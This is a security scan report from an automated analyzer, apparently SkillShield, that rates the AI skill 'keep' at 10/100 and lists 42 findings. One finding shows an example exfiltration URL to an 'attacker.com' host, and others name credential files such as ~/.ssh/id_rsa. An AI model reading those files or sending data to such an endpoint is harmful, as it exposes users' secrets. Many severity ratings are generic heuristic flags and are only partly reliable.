Trust Assessment
keep received a trust score of 10/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 42 findings: 10 critical, 13 high, 14 medium, and 3 low severity. Key findings include Unsafe environment variable passthrough, Arbitrary command execution, Credential harvesting.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The Manifest Analysis layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings42
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/hughpyle/keep/keep/api.py:2273 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/hughpyle/keep/tests/test_cli.py:27 | |
| CRITICAL | Arbitrary command execution Python shell execution (os.system, subprocess) Review all shell execution calls. Ensure commands are static (not built from user input), use absolute paths, and are strictly necessary. Prefer library APIs over shell commands. | Manifest | skills/hughpyle/keep/tests/test_config_command.py:30 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/hughpyle/keep/keep/config.py:272 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/hughpyle/keep/keep/config.py:277 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/hughpyle/keep/keep/providers/embeddings.py:102 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/hughpyle/keep/keep/providers/llm.py:62 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/hughpyle/keep/keep/providers/llm.py:132 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/hughpyle/keep/keep/providers/llm.py:346 | |
| CRITICAL | Credential harvesting Reading well-known credential environment variables Skills should only access environment variables they explicitly need. Bulk environment dumps (os.environ.copy, JSON.stringify(process.env)) are almost always malicious. Remove access to Keychain, GPG keys, and credential stores. | Manifest | skills/hughpyle/keep/keep/providers/llm.py:411 | |
| HIGH | Unsafe environment variable passthrough Access to well-known credential environment variables Minimize environment variable exposure. Only pass required, non-sensitive variables to MCP servers. Use dedicated secret management instead of environment passthrough. | Manifest | skills/hughpyle/keep/keep/config.py:272 | |
| HIGH | Unsafe environment variable passthrough Access to well-known credential environment variables Minimize environment variable exposure. Only pass required, non-sensitive variables to MCP servers. Use dedicated secret management instead of environment passthrough. | Manifest | skills/hughpyle/keep/keep/config.py:277 | |
| HIGH | Unsafe environment variable passthrough Access to well-known credential environment variables Minimize environment variable exposure. Only pass required, non-sensitive variables to MCP servers. Use dedicated secret management instead of environment passthrough. | Manifest | skills/hughpyle/keep/keep/providers/embeddings.py:102 | |
| HIGH | Unsafe environment variable passthrough Access to well-known credential environment variables Minimize environment variable exposure. Only pass required, non-sensitive variables to MCP servers. Use dedicated secret management instead of environment passthrough. | Manifest | skills/hughpyle/keep/keep/providers/llm.py:62 | |
| HIGH | Unsafe environment variable passthrough Access to well-known credential environment variables Minimize environment variable exposure. Only pass required, non-sensitive variables to MCP servers. Use dedicated secret management instead of environment passthrough. | Manifest | skills/hughpyle/keep/keep/providers/llm.py:132 | |
| HIGH | Unsafe environment variable passthrough Access to well-known credential environment variables Minimize environment variable exposure. Only pass required, non-sensitive variables to MCP servers. Use dedicated secret management instead of environment passthrough. | Manifest | skills/hughpyle/keep/keep/providers/llm.py:346 | |
| HIGH | Unsafe environment variable passthrough Access to well-known credential environment variables Minimize environment variable exposure. Only pass required, non-sensitive variables to MCP servers. Use dedicated secret management instead of environment passthrough. | Manifest | skills/hughpyle/keep/keep/providers/llm.py:411 | |
| HIGH | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/hughpyle/keep/keep/document_store.py:872 | |
| HIGH | Dangerous call: subprocess.Popen() Call to 'subprocess.Popen()' detected in function '_spawn_processor'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/hughpyle/keep/keep/api.py:2273 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function 'run'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/hughpyle/keep/tests/test_cli.py:27 | |
| HIGH | Dangerous call: subprocess.run() Call to 'subprocess.run()' detected in function 'run'. This can execute arbitrary code. Avoid using dangerous functions like exec/eval/os.system. Use safer alternatives. | Static | skills/hughpyle/keep/tests/test_config_command.py:30 | |
| HIGH | Local File Data Exfiltration via User-Controlled URI The `FileDocumentProvider` allows reading arbitrary files within the user's home directory if the `uri` argument is controlled by untrusted input. The `SKILL.md` demonstrates `keep put "file:///path/to/important.pdf"`, indicating that the `uri` is user-controlled. While a check `path.is_relative_to(home)` prevents path traversal outside the home directory, it still permits access to sensitive files like `~/.ssh/id_rsa`, `~/.bashrc`, or application-specific configuration files containing credentials. The content of these files would then be processed, summarized, embedded, and stored by the `keep` skill, making them accessible within the skill's data store. Implement a more restrictive allow-list for file paths or types, or require explicit user confirmation for accessing specific sensitive file paths. Ensure that the `keep` store itself is adequately protected and its contents are not inadvertently exposed. | LLM | keep/providers/documents.py:86 | |
| HIGH | HTTP Data Exfiltration via User-Controlled URI The `HttpDocumentProvider` allows making HTTP/HTTPS requests to arbitrary public URLs if the `uri` argument is controlled by untrusted input. The `SKILL.md` demonstrates `keep put "https://example.com/doc"`, indicating that the `uri` is user-controlled. An attacker could craft a malicious URL (e.g., `https://attacker.com/exfil?data=<sensitive_info>`) and instruct the skill to `keep put` it. This would cause the skill to make an outbound request to the attacker's server, exfiltrating any data encoded in the URL parameters. While `_is_private_url` attempts to prevent SSRF to private networks, it does not mitigate exfiltration to public malicious endpoints. Implement a strict allow-list for domains that the skill is permitted to access via HTTP/HTTPS. Sanitize or restrict the content that can be embedded in the URL when making requests, especially if it originates from untrusted sources. Consider adding a user confirmation step for outbound network requests to new domains. | LLM | keep/providers/documents.py:194 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/hughpyle/keep/keep/providers/embeddings.py:283 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/hughpyle/keep/tests/conftest.py:4 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/hughpyle/keep/tests/test_cli.py:7 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/hughpyle/keep/tests/test_cli.py:114 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/hughpyle/keep/tests/test_cli.py:188 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/hughpyle/keep/tests/test_core.py:314 | |
| MEDIUM | Unsafe deserialization / dynamic eval Decryption followed by code execution Remove obfuscated code execution patterns. Legitimate code does not need base64-encoded payloads executed via eval, encrypted-then-executed blobs, or dynamic attribute resolution to call system functions. | Manifest | skills/hughpyle/keep/tests/test_embedding_cache.py:179 | |
| MEDIUM | Suspicious import: urllib.request Import of 'urllib.request' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/hughpyle/keep/keep/config.py:199 | |
| MEDIUM | Suspicious import: requests Import of 'requests' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/hughpyle/keep/keep/providers/documents.py:185 | |
| MEDIUM | Suspicious import: requests Import of 'requests' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/hughpyle/keep/keep/providers/embeddings.py:255 | |
| MEDIUM | Suspicious import: requests Import of 'requests' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/hughpyle/keep/keep/providers/embeddings.py:338 | |
| MEDIUM | Suspicious import: requests Import of 'requests' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/hughpyle/keep/keep/providers/llm.py:198 | |
| MEDIUM | Suspicious import: requests Import of 'requests' detected. This module provides network or low-level system access. Verify this import is necessary. Network and system modules in skill code may indicate data exfiltration. | Static | skills/hughpyle/keep/keep/providers/llm.py:463 | |
| MEDIUM | Unpinned Python dependency version Dependency 'chromadb>=0.4' is not pinned to an exact version. Pin Python dependencies with exact versions where feasible. | Dependencies | skills/hughpyle/keep/pyproject.toml | |
| LOW | Node lockfile missing package.json is present but no lockfile was found (package-lock.json, pnpm-lock.yaml, or yarn.lock). Commit a lockfile for deterministic dependency resolution. | Dependencies | skills/hughpyle/keep/keep/data/openclaw-plugin/package.json | |
| LOW | Information Disclosure via User-Configured Ollama Host The `_detect_ollama` function in `keep/config.py` and `OllamaSummarization` in `keep/providers/llm.py` use the `OLLAMA_HOST` environment variable to connect to an Ollama server. If this environment variable is configured by a user to point to an attacker-controlled server, the skill will make requests to that server. This could reveal information about the skill's usage, the environment it's running in, or the types of models being requested, potentially aiding an attacker in profiling the system or user. While this requires user misconfiguration, it's good practice to warn users about the implications of setting `OLLAMA_HOST` to untrusted endpoints. Ensure no sensitive data is inadvertently included in these requests beyond what is necessary for Ollama API interaction. | LLM | keep/config.py:204 | |
| LOW | Unpinned Dependencies and Model Downloads The `pyproject.toml` specifies dependencies with minimum versions (e.g., `chromadb>=0.4`, `sentence-transformers>=2.2`) rather than exact pins. This allows for automatic updates to newer versions, which could potentially introduce vulnerabilities or breaking changes. Additionally, several ML providers (`SentenceTransformerEmbedding`, `MLXEmbedding`, `MLXSummarization`, `MLXTagging`) download models from external hubs (HuggingFace, mlx-community). A compromise of these model hubs could lead to the download and execution of malicious models, posing a supply chain risk. Consider pinning dependencies to exact versions or using a lock file (e.g., `poetry.lock`, `pip-tools`) to ensure reproducible builds and prevent unexpected updates. For ML models, verify model hashes or use trusted, curated model sources. Implement integrity checks for downloaded models. | LLM | pyproject.toml:25 | |
| INFO | Modification of Host Tool Configuration File The `_install_claude_code_hooks` function modifies the `settings.json` file located in the user's `.claude` directory. While this is intended for integrating the `keep` skill with Claude Code, it represents the skill modifying configuration files outside its own dedicated data store. This could be considered an excessive permission if the user is not fully aware of the changes being made to their Claude Code environment, potentially altering its behavior or security settings. Clearly inform users about the specific configuration files that will be modified during integration and provide an easy way to review or revert these changes. Consider making such modifications opt-in rather than automatic. | LLM | keep/integrations.py:170 | |
| INFO | Potential Prompt Injection in LLM Interactions The LLM-based summarization and tagging providers (`AnthropicSummarization`, `OpenAISummarization`, `OllamaSummarization`, `MLXSummarization`, `MLXTagging`) construct prompts using user-provided `content` and `context`. Although the prompt structure attempts to guide the LLM's behavior (e.g., 'Summarize this document in under 200 words'), a sufficiently sophisticated prompt injection attack could potentially manipulate the LLM to generate undesirable output, ignore instructions, or reveal information from its training data or other parts of the prompt. This is a general risk inherent in LLM interactions with untrusted input. Implement robust prompt engineering techniques, including clear instruction delimiters, few-shot examples, and output formatting constraints. Consider using LLM safety filters or content moderation APIs. Regularly review and update prompt strategies to counter evolving injection techniques. | LLM | keep/providers/base.py:182 |
Scan History
Embed Code
[](https://skillshield.io/report/704b4e24cedc4ea6)
Powered by SkillShield